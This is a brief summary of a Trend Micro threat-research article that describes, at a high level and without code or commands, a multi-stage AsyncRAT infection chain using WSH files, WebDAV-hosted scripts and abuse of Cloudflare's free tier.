Analyzing a Multi-Stage AsyncRAT Campaign

Analyzing a Multi-Stage AsyncRAT Campaign via Managed Detection and Response www.trendmicro.com/en_us/res… AsyncRAT has emerged as a notable remote access trojan (RAT) used by threat actors for its robust capabilities and ease of deployment. It gained favour for its extensive feature set, which includes keylogging, screen capturing, and remote command execution capabilities. Its modular architecture, typically implemented in Python, provides flexibility and ease of customization, making it a preferred tool of choice for cybercriminals. During Trend Micro’s investigation of AsyncRAT infections, Python scripts played a central role in the infection chain, automating various stages of the attack. The initial payload, a Windows Script Host (WSH) file, was designed to download and execute additional malicious scripts hosted on a WebDAV server. These scripts facilitated the download of batch files and further payloads, enabling a seamless and persistent infection routine. The attackers exploited Cloudflare’s free-tier services to host their WebDAV server, abusing the platform’s reliability and widespread trust to evade detection. By using Cloudflare’s infrastructure, the threat actors masked malicious activity under legitimate domains, making it challenging for traditional security solutions to identify and block the threat. Similar behaviour was documented previously by other researchers. Since then, there have been changes in the scripts’ behaviour, as well as differences in the primary payloads. This entry dissects the attack chain from initial compromise through AsyncRAT deployment, examining the attacker’s techniques for system infiltration and persistent access.